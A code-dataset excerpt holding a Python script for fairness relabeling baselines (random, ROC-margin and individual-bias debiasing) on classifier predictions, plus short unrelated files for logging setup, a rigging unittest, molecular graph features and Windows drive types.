random, roc (reject option based classification), igd (individual group debiasing)\nbudget = int(args.budget) # no of iterations\nfair_constraint = args.fair_constraint # max or 0.95\nif fair_constraint != \"max\":\n fair_bound = float(fair_constraint)\nn_run = int(args.n_run)\nload_folder_model = \"initial_model\"\nsave_folder_model = \"relabel_model\"\n\n# relabel samples in critical region\ndef relabel(X_true, y_true, current_ROC_margin, current_class_threshold=0.5):\n # X_true contains samples\n # y_true is predicted scores of initial model\n # y_pred_round is new predicted labels after relabeling\n y_pred_round = np.zeros(len(y_true))\n\n # find positive samples whose initial predicted scores are greater than current classification threshold\n fav_pred_inds = (y_true > current_class_threshold)\n # find negative samples whose initial predicted scores are smaller than current classification threshold\n unfav_pred_inds = ~fav_pred_inds\n # reformat indices\n fav_pred_inds = np.array(fav_pred_inds).reshape(1, -1)[0]\n unfav_pred_inds = np.array(unfav_pred_inds).reshape(1, -1)[0]\n # assign predicted positive labels to positive samples\n y_pred_round[fav_pred_inds] = 1\n # assign predicted negative labels to negative samples\n y_pred_round[unfav_pred_inds] = 0\n\n # find samples in critical region around classification boundary\n crit_region_inds = np.logical_and(y_true <= current_class_threshold + current_ROC_margin,\n y_true >= current_class_threshold - current_ROC_margin)\n\n # find favored and unfavored samples\n favored_indices = (X_true[:, sen_idx] == 1)\n unfavored_indices = (X_true[:, sen_idx] == 0)\n # reformat indices\n favored_indices = np.array(favored_indices).reshape(-1, 1)\n unfavored_indices = np.array(unfavored_indices).reshape(-1, 1)\n\n # relabel samples in critical region\n # favored samples are assigned negative labels whereas unfavored samples are assigned positive labels\n crit_favored_indices = np.logical_and(crit_region_inds, favored_indices)\n crit_unfavored_indices = np.logical_and(crit_region_inds, unfavored_indices)\n # reformat indices\n crit_favored_indices = np.array(crit_favored_indices).reshape(1, -1)[0]\n crit_unfavored_indices = np.array(crit_unfavored_indices).reshape(1, -1)[0]\n y_pred_round[crit_favored_indices] = 0\n y_pred_round[crit_unfavored_indices] = 1\n\n return y_pred_round\n\n# debias samples having individual biases\ndef debias(X_true, y_true, y_true_inverse, indi_bias_scores, current_indi_bias_threshold):\n # X_true contains samples\n # y_true is predicted scores of initial model\n # y_true_inverse is predicted scores of initial model with inverse sensitive feature\n # indi_bias_scores contains individual bias scores of samples in X_true\n # y_pred is new predicted scores after relabeling\n y_pred = copy.deepcopy(y_true)\n\n # find biased samples whose individual bias scores are greater than current individual bias threshold\n biased_indices = (indi_bias_scores > current_indi_bias_threshold)\n # find unbiased samples whose individual bias scores are smaller than current individual bias threshold\n unbiased_indices = ~biased_indices\n # reformat indices\n biased_indices = np.array(biased_indices).reshape(1, -1)[0]\n unbiased_indices = np.array(unbiased_indices).reshape(1, -1)[0]\n # create individual bias indicators\n indi_bias_indicators = np.zeros(len(indi_bias_scores))\n # assign 1 to biased samples\n indi_bias_indicators[biased_indices] = 1\n # assign 0 to unbiased samples\n indi_bias_indicators[unbiased_indices] = 0\n\n # NOTE: igd method only focus on relabeling unfavored samples\n # find unfavored samples\n unfavored_indices = (X_true[:, sen_idx] == 0)\n\n # find biased unfavored samples\n biased_unfavored_indices = np.logical_and(indi_bias_indicators.astype(bool), unfavored_indices)\n # relabel biased unfavored samples\n y_pred[biased_unfavored_indices] = y_true_inverse[biased_unfavored_indices]\n\n # y_pred_round is new predicted labels after relabeling\n y_pred_round = np.around(y_pred)\n\n return y_pred_round\n\nstart_date_time = datetime.datetime.now()\nstart_time = timeit.default_timer()\n\n# read data\n_, _, _, _, sen_var_indices = read_data.from_file(dataset, sensitive)\n# get sensitive feature index\nsen_idx = sen_var_indices[0]\n\n# accuracy, group_fairness, individual_fairness\nacc_valid_baseline, fair_valid_baseline, individual_valid_baseline = np.zeros(n_run), np.zeros(n_run), np.zeros(n_run)\nacc_test_baseline, fair_test_baseline, individual_test_baseline = np.zeros(n_run), np.zeros(n_run), np.zeros(n_run)\nfor run in range(n_run):\n print(\"run={}\".format(run))\n # load initial trained model from file\n trained_model = load_model(\"./{}/model_{}_{}_vs{}_ts{}_run{}.h5\".\n format(load_folder_model, dataset, sensitive, valid_size, test_size, run))\n\n # load validation set and prediction from file\n with open(\"./{}/X_valid_{}_{}_vs{}_ts{}_run{}.file\".\n format(load_folder_model, dataset, sensitive, valid_size, test_size, run), \"rb\") as f:\n X_valid = np.load(f)\n with open(\"./{}/y_valid_{}_{}_vs{}_ts{}_run{}.file\".\n format(load_folder_model, dataset, sensitive, valid_size, test_size, run), \"rb\") as f:\n y_valid = np.load(f)\n with open(\"./{}/y_pred_validation_{}_{}_vs{}_ts{}_run{}.file\".\n format(load_folder_model, dataset, sensitive, valid_size, test_size, run), \"rb\") as f:\n y_pred_validation = np.load(f)\n # compute initial predicted labels on validation set\n y_pred_validation_round = np.around(y_pred_validation)\n # compute accuracy and fairness on validation set\n accuracy_overall_valid, demographic_parity_valid, \\\n prob_favored_pred_positive_valid, prob_unfavored_pred_positive_valid \\\n = group_fairness.compute_accuracy_fairness(X_valid, sen_idx, y_valid, y_pred_validation_round)\n\n # load testing set and prediction from file\n with open(\"./{}/X_test_{}_{}_vs{}_ts{}_run{}.file\".\n format(load_folder_model, dataset, sensitive, valid_size, test_size, run), \"rb\") as f:\n X_test = np.load(f)\n with open(\"./{}/y_test_{}_{}_vs{}_ts{}_run{}.file\".\n format(load_folder_model, dataset, sensitive, valid_size, test_size, run), \"rb\") as f:\n y_test = np.load(f)\n with open(\"./{}/y_pred_testing_{}_{}_vs{}_ts{}_run{}.file\".\n format(load_folder_model, dataset, sensitive, valid_size, test_size, run), \"rb\") as f:\n y_pred_testing = np.load(f)\n # compute initial predicted labels on testing set\n y_pred_testing_round = np.around(y_pred_testing)\n # compute accuracy and fairness on testing set\n accuracy_overall_test, demographic_parity_test, \\\n prob_favored_pred_positive_test, prob_unfavored_pred_positive_test \\\n = group_fairness.compute_accuracy_fairness(X_test, sen_idx, y_test, y_pred_testing_round)\n\n # baseline to improve fairness\n n_valid = len(y_valid)\n n_test = len(y_test)\n print(\"n_valid: {}, n_test: {}\".format(n_valid, n_test))\n if method == \"random\":\n # select randomly samples from validation/testing set and relabel them to improve fairness\n # no of random samples equals to no of optimization iterations in other methods\n # NOTE: random method works directly on testing set, it doesn't require validation set\n print(\"relabel validation set\")\n sample_indices = np.random.choice(range(n_valid), budget)\n for sample_cnt, sample_idx in enumerate(sample_indices):\n print(\"sample_cnt: {}, sample_idx: {}\".format(sample_cnt, sample_idx))\n # get a random sample\n random_sample = X_valid[sample_idx]\n # get its sensitive feature\n random_sample_sen = random_sample[sen_idx]\n print(\"random_sample_sen: {}\".format(random_sample_sen))\n # more positive outcome for favored group than positive outcome for unfavored group\n if prob_favored_pred_positive_valid > prob_unfavored_pred_positive_valid:\n # this sample belongs to favored group\n if random_sample_sen == 1:\n # we assign negative outcome to decrease prob_favored_pred_positive\n y_pred_validation_round[sample_idx] = 0\n # this sample belongs to unfavored group\n elif random_sample_sen == 0:\n # we assign positive outcome to increase prob_unfavored_pred_positive\n y_pred_validation_round[sample_idx] = 1\n # less positive outcome for favored group than positive outcome for unfavored group\n if prob_favored_pred_positive_valid < prob_unfavored_pred_positive_valid:\n # this sample belongs to favored group\n if random_sample_sen == 1:\n # we assign positive outcome to increase prob_favored_pred_positive\n y_pred_validation_round[sample_idx] = 1\n # this sample belongs to unfavored group\n elif random_sample_sen == 0:\n # we assign negative outcome to decrease prob_unfavored_pred_positive\n y_pred_validation_round[sample_idx] = 0\n # re-compute accuracy and fairness on validation set\n accuracy_overall_valid, demographic_parity_valid, \\\n prob_favored_pred_positive_valid, prob_unfavored_pred_positive_valid \\\n = group_fairness.compute_accuracy_fairness(X_valid, sen_idx, y_valid, y_pred_validation_round)\n print(\"relabeling func on validation\")\n print(\"accuracy={}, fairness={}, p_favored_positive={}, p_unfavored_positive={}\".\n format(round(accuracy_overall_valid, 2), round(demographic_parity_valid, 2),\n round(prob_favored_pred_positive_valid, 4), round(prob_unfavored_pred_positive_valid, 4)))\n # re-compute theil_index on validation set\n theil_index_valid = individual_fairness.generalized_entropy_index(y_valid, y_pred_validation_round)\n print(\"theil_index={}\".format(round(theil_index_valid, 2)))\n\n print(\"relabel testing set\")\n sample_indices = np.random.choice(range(n_test), budget)\n for sample_cnt, sample_idx in enumerate(sample_indices):\n print(\"sample_cnt: {}, sample_idx: {}\".format(sample_cnt, sample_idx))\n # get a random sample\n random_sample = X_test[sample_idx]\n # get its sensitive feature\n random_sample_sen = random_sample[sen_idx]\n print(\"random_sample_sen: {}\".format(random_sample_sen))\n # more positive outcome for favored group than positive outcome for unfavored group\n if prob_favored_pred_positive_test > prob_unfavored_pred_positive_test:\n # this sample belongs to favored group\n if random_sample_sen == 1:\n # we assign negative outcome to decrease prob_favored_pred_positive\n y_pred_testing_round[sample_idx] = 0\n # this sample belongs to unfavored group\n elif random_sample_sen == 0:\n # we assign positive outcome to increase prob_unfavored_pred_positive\n y_pred_testing_round[sample_idx] = 1\n # less positive outcome for favored group than positive outcome for unfavored group\n if prob_favored_pred_positive_test < prob_unfavored_pred_positive_test:\n # this sample belongs to favored group\n if random_sample_sen == 1:\n # we assign positive outcome to increase prob_favored_pred_positive\n y_pred_testing_round[sample_idx] = 1\n # this sample belongs to unfavored group\n elif random_sample_sen == 0:\n # we assign negative outcome to decrease prob_unfavored_pred_positive\n y_pred_testing_round[sample_idx] = 0\n # re-compute accuracy and fairness on testing set\n accuracy_overall_test, demographic_parity_test, \\\n prob_favored_pred_positive_test, prob_unfavored_pred_positive_test \\\n = group_fairness.compute_accuracy_fairness(X_test, sen_idx, y_test, y_pred_testing_round)\n print(\"relabeling func on testing\")\n print(\"accuracy={}, fairness={}, p_favored_positive={}, p_unfavored_positive={}\".\n format(round(accuracy_overall_test, 2), round(demographic_parity_test, 2),\n round(prob_favored_pred_positive_test, 4), round(prob_unfavored_pred_positive_test, 4)))\n # re-compute theil_index on testing set\n theil_index_test = individual_fairness.generalized_entropy_index(y_test, y_pred_testing_round)\n print(\"theil_index={}\".format(round(theil_index_test, 2)))\n\n # roc fixes optimal classification threshold to 0.5 (default value) and only finds optimal ROC margin\n if method == \"roc\":\n # search range of ROC margin\n low_ROC_margin = 0.0\n high_ROC_margin = 0.5\n # no of ROC margins to search\n num_ROC_margin = budget\n if fair_constraint != \"max\":\n # upper and lower bounds of fairness\n metric_ub = 1.0 - fair_bound\n metric_lb = fair_bound - 1.0\n # optimal ROC margin\n optimal_ROC_margin = None\n\n # step 1: search optimal ROC margin on validation set such that it is small\n # (i.e. no of samples to relabel is small => accuracy is maintained) while\n # fairness score satisfies fairness constraint (i.e. fairness is improved)\n fairness_arr = np.zeros(num_ROC_margin)\n ROC_margin_arr = np.zeros_like(fairness_arr)\n cnt = 0\n # iterate through possible ROC margins\n for ROC_margin in np.linspace(low_ROC_margin, high_ROC_margin, num_ROC_margin):\n print(\"cnt: {}\".format(cnt))\n print(\"current ROC_margin: {}\".format(round(ROC_margin, 4)))\n # use current ROC margin to relabel samples in critical region\n y_pred_validation_round = relabel(X_valid, y_pred_validation, ROC_margin)\n # re-compute accuracy and fairness on validation set\n accuracy_overall_valid, demographic_parity_valid, \\\n prob_favored_pred_positive_valid, prob_unfavored_pred_positive_valid \\\n = group_fairness.compute_accuracy_fairness(X_valid, sen_idx, y_valid, y_pred_validation_round)\n print(\"relabeling func on validation\")\n print(\"accuracy={}, fairness={}, p_favored_positive={}, p_unfavored_positive={}\".\n format(round(accuracy_overall_valid, 2), round(demographic_parity_valid, 2),\n round(prob_favored_pred_positive_valid, 4), round(prob_unfavored_pred_positive_valid, 4)))\n # re-compute theil_index on validation set\n theil_index_valid = individual_fairness.generalized_entropy_index(y_valid, y_pred_validation_round)\n print(\"theil_index={}\".format(round(theil_index_valid, 2)))\n # compute fairness with current ROC margin\n # in ROC method, fairness is defined as P(y=positive|S=unprivileged) - P(y=positive|S=privileged)\n fairness_arr[cnt] = prob_unfavored_pred_positive_valid - prob_favored_pred_positive_valid\n ROC_margin_arr[cnt] = ROC_margin\n cnt += 1\n # find good fairness scores that satisfy fairness constraint\n if fair_constraint == \"max\":\n rel_inds = (np.abs(fairness_arr) == np.min(np.abs(fairness_arr)))\n else:\n rel_inds = np.logical_and(fairness_arr >= metric_lb, fairness_arr <= metric_ub)\n # if we can find some good fairness scores, then get the best one that has possible highest accuracy\n # (i.e. ROC margin is smallest => critical region is smallest => least samples are relabeled)\n if any(rel_inds):\n print(\"Find some good fairness scores\")\n # get good fairness score with smallest ROC margin\n best_ind = np.where(ROC_margin_arr[rel_inds] == np.min(ROC_margin_arr[rel_inds]))[0][0]\n # cannot find any good fairness score satisfying fairness constraint\n # we get best fairness score (i.e. smallest discrimination)\n else:\n print(\"Cannot find any good fairness score\")\n print(\"fairness_arr: {}\".format(fairness_arr))\n rel_inds = np.ones(len(fairness_arr), dtype=bool)\n print(\"fairness_arr[rel_inds]: {}\".format(fairness_arr[rel_inds]))\n best_ind = np.where(np.abs(fairness_arr[rel_inds]) == np.min(np.abs(fairness_arr[rel_inds])))[0][0]\n print(\"best_ind: {}, smallest_disc: {}\".format(best_ind, fairness_arr[rel_inds][best_ind]))\n # get optimal ROC margin\n optimal_ROC_margin = ROC_margin_arr[rel_inds][best_ind] # get best index among good fairness scores\n print(\"optimal ROC_margin: {}\".format(round(optimal_ROC_margin, 4)))\n\n # step 2: use optimal ROC margin to relabel samples in validation set and testing set\n print(\"relabeling func on validation\")\n y_pred_validation_round = relabel(X_valid, y_pred_validation, optimal_ROC_margin)\n # reformat y_pred_validation_round as same as y_valid\n y_pred_validation_round = np.array(y_pred_validation_round).reshape(-1, 1)\n # re-compute accuracy and fairness on validation set\n accuracy_overall_valid, demographic_parity_valid, \\\n prob_favored_pred_positive_valid, prob_unfavored_pred_positive_valid \\\n = group_fairness.compute_accuracy_fairness(X_valid, sen_idx, y_valid, y_pred_validation_round)\n print(\"accuracy={}, fairness={}, p_favored_positive={}, p_unfavored_positive={}\".\n format(round(accuracy_overall_valid, 2), round(demographic_parity_valid, 2),\n round(prob_favored_pred_positive_valid, 4), round(prob_unfavored_pred_positive_valid, 4)))\n # re-compute theil_index on validation set\n theil_index_valid = individual_fairness.generalized_entropy_index(y_valid, y_pred_validation_round)\n print(\"theil_index={}\".format(round(theil_index_valid, 2)))\n\n print(\"relabeling func on testing\")\n y_pred_testing_round = relabel(X_test, y_pred_testing, optimal_ROC_margin)\n # reformat y_pred_testing_round as same as y_test\n y_pred_testing_round = np.array(y_pred_testing_round).reshape(-1, 1)\n # re-compute accuracy and fairness on testing set\n accuracy_overall_test, demographic_parity_test, \\\n prob_favored_pred_positive_test, prob_unfavored_pred_positive_test = \\\n group_fairness.compute_accuracy_fairness(X_test, sen_idx, y_test, y_pred_testing_round)\n print(\"accuracy={}, fairness={}, p_favored_positive={}, p_unfavored_positive={}\".\n format(round(accuracy_overall_test, 2), round(demographic_parity_test, 2),\n round(prob_favored_pred_positive_test, 4), round(prob_unfavored_pred_positive_test, 4)))\n # re-compute theil_index on testing set\n theil_index_test = individual_fairness.generalized_entropy_index(y_test, y_pred_testing_round)\n print(\"theil_index={}\".format(round(theil_index_test, 2)))\n\n if method == \"igd\":\n # search range for individual bias threshold\n low_indi_bias_thresh = 0.0\n high_indi_bias_thresh = 1.0\n # no of individual bias thresholds to search\n num_indi_bias_thresh = budget\n if fair_constraint != \"max\":\n # upper and lower bounds of fairness\n metric_ub = 1.0 - fair_bound\n metric_lb = fair_bound - 1.0\n # optimal individual bias threshold\n optimal_indi_bias_threshold = None\n\n # step 1: compute individual bias score for each sample in validation set\n # individual bias score of a sample x is the difference in initial predicted score if the sensitive feature of x\n # is set inversely i.e. indi_bias_score(x) = f(x, S=1) - f(x, S=0)\n\n # create a new validation set where sensitive value is reversed\n X_valid_inverse = copy.deepcopy(X_valid)\n X_valid_inverse[:, sen_idx] = 1 - X_valid_inverse[:, sen_idx]\n # compute initial predicted scores on inverse validation set\n y_pred_validation_inverse = trained_model.predict(X_valid_inverse)\n indi_bias_scores_valid = y_pred_validation_inverse - y_pred_validation\n\n # step 2: search optimal individual bias threshold on validation set such that\n # individual bias threshold has highest value (i.e. biased samples really have serious individual biases) while\n # group fairness score satisfies group fairness constraint (i.e. group fairness is improved)\n group_fairness_arr = np.zeros(num_indi_bias_thresh)\n indi_bias_thresh_arr = np.zeros_like(group_fairness_arr)\n cnt = 0\n # iterate through possible individual bias thresholds\n for indi_bias_thresh in np.linspace(low_indi_bias_thresh, high_indi_bias_thresh, num_indi_bias_thresh):\n print(\"cnt: {}\".format(cnt))\n print(\"current indi_bias_threshold: {}\".format(round(indi_bias_thresh, 4)))\n # use current individual bias threshold to select biased samples and relabel them\n y_pred_validation_round = debias(X_valid, y_pred_validation, y_pred_validation_inverse,\n indi_bias_scores_valid, indi_bias_thresh)\n # re-compute accuracy and fairness on validation set\n accuracy_overall_valid, demographic_parity_valid, \\\n prob_favored_pred_positive_valid, prob_unfavored_pred_positive_valid \\\n = group_fairness.compute_accuracy_fairness(X_valid, sen_idx, y_valid, y_pred_validation_round)\n print(\"relabeling func on validation\")\n print(\"accuracy={}, fairness={}, p_favored_positive={}, p_unfavored_positive={}\".\n format(round(accuracy_overall_valid, 2), round(demographic_parity_valid, 2),\n round(prob_favored_pred_positive_valid, 4), round(prob_unfavored_pred_positive_valid, 4)))\n # re-compute theil_index on validation\n theil_index_valid = individual_fairness.generalized_entropy_index(y_valid, y_pred_validation_round)\n print(\"theil_index={}\".format(round(theil_index_valid, 2)))\n # compute group fairness with current individual bias threshold\n # in IGD method, group fairness is defined as P(y=positive|S=unprivileged) - P(y=positive|S=privileged)\n group_fairness_arr[cnt] = prob_unfavored_pred_positive_valid - prob_favored_pred_positive_valid\n indi_bias_thresh_arr[cnt] = indi_bias_thresh\n cnt += 1\n # find good group fairness scores that satisfy group fairness constraint\n if fair_constraint == \"max\":\n rel_inds = (np.abs(group_fairness_arr) == np.min(np.abs(group_fairness_arr)))\n else:\n rel_inds = np.logical_and(group_fairness_arr >= metric_lb, group_fairness_arr <= metric_ub)\n # if we can find some good group fairness scores, then get the best one that has highest individual bias score\n # since it means that chosen biased samples really have serious individual biases\n if any(rel_inds):\n print(\"Find some good group fairness scores\")\n # get good group fairness score with highest individual bias threshold\n best_ind = np.where(indi_bias_thresh_arr[rel_inds] == np.max(indi_bias_thresh_arr[rel_inds]))[0][0]\n # cannot find any good group fairness score satisfying group fairness constraint\n # we get best group fairness score (i.e. smallest group discrimination)\n else:\n print(\"Cannot find any good group fairness score\")\n print(\"fairness_arr: {}\".format(group_fairness_arr))\n rel_inds = np.ones(len(group_fairness_arr), dtype=bool)\n print(\"fairness_arr[rel_inds]: {}\".format(group_fairness_arr[rel_inds]))\n best_ind = np.where(np.abs(group_fairness_arr[rel_inds]) == np.min(np.abs(group_fairness_arr[rel_inds])))[0][0]\n print(\"best_ind: {}, smallest_disc: {}\".format(best_ind, group_fairness_arr[rel_inds][best_ind]))\n # get optimal individual bias threshold\n optimal_indi_bias_threshold = indi_bias_thresh_arr[rel_inds][best_ind] # get best index among good fairness scores\n print(\"optimal indi_bias_threshold: {}\".format(round(optimal_indi_bias_threshold, 4)))\n\n # step 3: use optimal individual bias threshold to relabel samples in validation set and testing set\n y_pred_validation_round = debias(X_valid, y_pred_validation, y_pred_validation_inverse,\n indi_bias_scores_valid, optimal_indi_bias_threshold)\n # re-compute accuracy and fairness on validation set\n accuracy_overall_valid, demographic_parity_valid, \\\n prob_favored_pred_positive_valid, prob_unfavored_pred_positive_valid \\\n = group_fairness.compute_accuracy_fairness(X_valid, sen_idx, y_valid, y_pred_validation_round)\n print(\"relabeling func on validation\")\n print(\"accuracy={}, fairness={}, p_favored_positive={}, p_unfavored_positive={}\".\n format(round(accuracy_overall_valid, 2), round(demographic_parity_valid, 2),\n round(prob_favored_pred_positive_valid, 4), round(prob_unfavored_pred_positive_valid, 4)))\n # re-compute theil_index on validation\n theil_index_valid = individual_fairness.generalized_entropy_index(y_valid, y_pred_validation_round)\n print(\"theil_index={}\".format(round(theil_index_valid, 2)))\n\n # create a new testing set where sensitive value is reversed\n X_test_inverse = copy.deepcopy(X_test)\n X_test_inverse[:, sen_idx] = 1 - X_test_inverse[:, sen_idx]\n # compute initial predicted scores on inverse testing set\n y_pred_testing_inverse = trained_model.predict(X_test_inverse)\n indi_bias_scores_test = y_pred_testing_inverse - y_pred_testing\n y_pred_testing_round = debias(X_test, y_pred_testing, y_pred_testing_inverse,\n indi_bias_scores_test, optimal_indi_bias_threshold)\n # re-compute accuracy and fairness on testing set\n accuracy_overall_test, demographic_parity_test, \\\n prob_favored_pred_positive_test, prob_unfavored_pred_positive_test \\\n = group_fairness.compute_accuracy_fairness(X_test, sen_idx, y_test, y_pred_testing_round)\n print(\"relabeling func on testing\")\n print(\"accuracy={}, fairness={}, p_favored_positive={}, p_unfavored_positive={}\".\n format(round(accuracy_overall_test, 2), round(demographic_parity_test, 2),\n round(prob_favored_pred_positive_test, 4), round(prob_unfavored_pred_positive_test, 4)))\n # re-compute theil_index on testing set\n theil_index_test = individual_fairness.generalized_entropy_index(y_test, y_pred_testing_round)\n print(\"theil_index={}\".format(round(theil_index_test, 2)))\n\n acc_valid_baseline[run] = accuracy_overall_valid\n fair_valid_baseline[run] = demographic_parity_valid\n individual_valid_baseline[run] = theil_index_valid\n acc_test_baseline[run] = accuracy_overall_test\n fair_test_baseline[run] = demographic_parity_test\n individual_test_baseline[run] = theil_index_test\n\n # save new predicted labels of relabeling function to file\n if method == \"random\":\n with open(\"./{}/y_relabel_validation_{}_{}_{}_vs{}_ts{}_run{}.file\".\n format(save_folder_model, method, dataset, sensitive, valid_size, test_size, run), \"wb\") as f:\n np.save(f, y_pred_validation_round)\n with open(\"./{}/y_relabel_testing_{}_{}_{}_vs{}_ts{}_run{}.file\".\n format(save_folder_model, method, dataset, sensitive, valid_size, test_size, run), \"wb\") as f:\n np.save(f, y_pred_testing_round)\n else:\n with open(\"./{}/y_relabel_validation_{}_{}_{}_vs{}_ts{}_fair_{}_run{}.file\".\n format(save_folder_model, method, dataset, sensitive, valid_size, test_size, fair_constraint, run), \"wb\") as f:\n np.save(f, y_pred_validation_round)\n with open(\"./{}/y_relabel_testing_{}_{}_{}_vs{}_ts{}_fair_{}_run{}.file\".\n format(save_folder_model, method, dataset, sensitive, valid_size, test_size, fair_constraint, run), \"wb\") as f:\n np.save(f, y_pred_testing_round)\n# end run\n\nend_date_time = datetime.datetime.now()\nend_time = timeit.default_timer()\nprint(\"start date time: {} and end date time: {}\".format(start_date_time, end_date_time))\nprint(\"runtime: {}(s)\".format(round(end_time-start_time, 2)))\n\n# save result to file\nacc_valid, acc_valid_std = round(np.mean(acc_valid_baseline), 2), round(np.std(acc_valid_baseline), 2)\nfair_valid, fair_valid_std = round(np.mean(fair_valid_baseline), 2), round(np.std(fair_valid_baseline), 2)\nindividual_valid, individual_valid_std = round(np.mean(individual_valid_baseline), 2), round(np.std(individual_valid_baseline), 2)\nacc_test, acc_test_std = round(np.mean(acc_test_baseline), 2), round(np.std(acc_test_baseline), 2)\nfair_test, fair_test_std = round(np.mean(fair_test_baseline), 2), round(np.std(fair_test_baseline), 2)\nindividual_test, individual_test_std = round(np.mean(individual_test_baseline), 2), round(np.std(individual_test_baseline), 2)\nif method == \"random\":\n file_name = './{}/_{}_{}_{}_vs{}_ts{}_budget_{}.txt'.format(save_folder_model, method, dataset, sensitive,\n valid_size, test_size, budget)\nelse:\n file_name = './{}/_{}_{}_{}_vs{}_ts{}_budget_{}_fair_{}.txt'.format(save_folder_model, method, dataset, sensitive,\n valid_size, test_size, budget, fair_constraint)\nwith open(file_name, 'w') as f:\n f.write(\"dataset: {}, sensitive: {}, validation_size: {}, test_size: {}\\n\".format(dataset, sensitive, valid_size, test_size))\n if method == \"random\":\n f.write(\"method: {}, budget: {}\\n\".format(method, budget))\n else:\n f.write(\"method: {}, budget: {}, fair_constraint: {}\\n\".format(method, budget, fair_constraint))\n f.write(\"acc_valid: {} ({}), fair_valid: {} ({}), individual_valid: {} ({})\\n\".\n format(acc_valid, acc_valid_std, fair_valid, fair_valid_std, individual_valid, individual_valid_std))\n f.write(\"acc_test: {} ({}), fair_test: {} ({}), individual_test: {} ({})\\n\".\n format(acc_test, acc_test_std, fair_test, fair_test_std, individual_test, individual_test_std))\n f.write(\"start date time: {} and end date time: {}\\n\".format(start_date_time, end_date_time))\n f.write(\"runtime: {}(s)\\n\".format(round(end_time-start_time, 2)))\n\n","repo_name":"nphdang/FCGP","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":32488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"6132772891","text":"from logging import CRITICAL, DEBUG, ERROR, INFO, WARNING\nfrom logging import getLogger as loggingGetLogger\nfrom logging.config import dictConfig\nfrom os import environ, makedirs, remove\nfrom os.path import isdir, isfile, join, split\n\n_BOT_LOGLEVEL_DEFAULT = \"INFO\"\n\n_configured = False\n\nvalid_log_levels = {\n \"DEBUG\": DEBUG,\n \"INFO\": INFO,\n \"WARNING\": WARNING,\n \"ERROR\": ERROR,\n \"CRITICAL\": CRITICAL,\n}\n\n\ndef _configure_logging():\n log_level = environ.get(\"BOT_LOGLEVEL\", _BOT_LOGLEVEL_DEFAULT)\n if log_level not in valid_log_levels:\n raise ValueError(\"Invalid level in BOT_LOGLEVEL var.\")\n dictConfig(\n {\n \"version\": 1,\n \"formatters\": {\n \"app\": {\n \"format\": \"{asctime} {levelname} [{name}] {msg}\",\n \"style\": \"{\",\n },\n },\n \"handlers\": {\n \"app\": {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"app\",\n },\n },\n \"loggers\": {\"app\": {\"level\": log_level, \"handlers\": [\"app\"]}},\n }\n )\n\n\ndef reset_logging():\n global _configured\n if not _configured:\n return\n _configure_logging()\n\n\ndef getLogger(name, level=None):\n global _configured\n if not _configured:\n _configure_logging()\n logger = loggingGetLogger(f\"app.{name}\")\n if level is not None:\n logger.setLevel(level)\n return logger\n","repo_name":"fjfnaranjo/fjfnaranjo-bot","sub_path":"fjfnaranjobot/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"3722412016","text":"\nimport unittest\n\nfrom kraken.core.objects.joint import Joint\n\n\nclass TestJoint(unittest.TestCase):\n\n def testGetRadius(self):\n testJoint = Joint('testJoint')\n\n self.assertEqual(testJoint.getRadius(), 1.0)\n\n def testSetRadius(self):\n testJoint = Joint('testJoint')\n\n self.assertRaises(AssertionError, lambda: testJoint.setRadius(True))\n self.assertTrue(testJoint.setRadius(0.25))\n self.assertEqual(testJoint.getRadius(), 0.25)\n\n\ndef suite():\n return unittest.TestLoader().loadTestsFromTestCase(TestJoint)\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"yoann01/Kraken","sub_path":"unittests/core/objects/test_joint.py","file_name":"test_joint.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40890924718","text":"import numpy as np\nfrom scipy.spatial.distance import pdist, squareform\n\n\natomic_symbol_to_number_dict = {\n \"H\": 1,\n \"C\": 6,\n \"N\": 7,\n \"O\": 8,\n \"F\": 9,\n \"P\": 15,\n \"S\": 16,\n \"CL\": 17,\n}\n\n\ndef atomic_symbols_to_numbers(symbols):\n return np.array(\n [atomic_symbol_to_number_dict[symbol.upper()] for symbol in symbols]\n ).reshape(-1, 1)\n\n\ndef get_distance_matrix(xyz):\n \"\"\"\n Get a distance matrix of distances between atoms\n\n Parameters:\n xyz (np.ndarray): array shape (n_atom, 3) of atomic coordinates\n\n Returns:\n distance matrix of type np.ndarray with shape (n_atoms, n_atoms)\n \"\"\"\n return squareform(pdist(xyz))\n\n\ndef get_receivers_senders(xyz, cutoff, self_loops=False):\n \"\"\"\n Get the two arrays receivers and senders\n Defines the graph connection by receiving\n and sending atom indices\n\n Parameters:\n xyz (np.ndarray): array shape (n_atom, 3) of atomic coordinates\n cutoff (int): No edge between atoms separated by dis. > cutoff\n\n Returns:\n receivers (np.ndarray): Shape (n_edges, 1), sorted\n senders (np.ndarray): Shape (n_edges, 1)\n \"\"\"\n distance_matrix = get_distance_matrix(xyz)\n edges = np.argwhere(distance_matrix <= cutoff)\n\n if not self_loops:\n argwhere = np.argwhere(edges[:, 0] != edges[:, 1]).flatten()\n edges = edges[argwhere]\n\n return edges[:, 0].reshape(-1, 1), edges[:, 1].reshape(-1, 1)\n\n\ndef get_atom_distances(distance_matrix, receivers, senders):\n atom_distances = distance_matrix[receivers, senders].flatten()\n return atom_distances\n","repo_name":"mtzgroup/BSIE-GNN","sub_path":"NN/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"44199853370","text":"import sys\nimport ctypes\n\n# Drive types\nDRIVE_UNKNOWN = 0 # The drive type cannot be determined.\nDRIVE_NO_ROOT_DIR = 1 # The root path is invalid; for example, there is no volume mounted at the specified path.\nDRIVE_REMOVABLE = 2 # The drive has removable media; for example, a floppy drive, thumb drive, or flash card reader.\nDRIVE_FIXED = 3 # The drive has fixed media; for example, a hard disk drive or flash drive.\nDRIVE_REMOTE = 4 # The drive is a remote (network) drive.\nDRIVE_CDROM = 5 # The drive is a CD-ROM drive.\nDRIVE_RAMDISK = 6 # The drive is a RAM disk.\n\n# Map drive types to strings\nDRIVE_TYPE_MAP = { DRIVE_UNKNOWN : 'DRIVE_UNKNOWN',\n 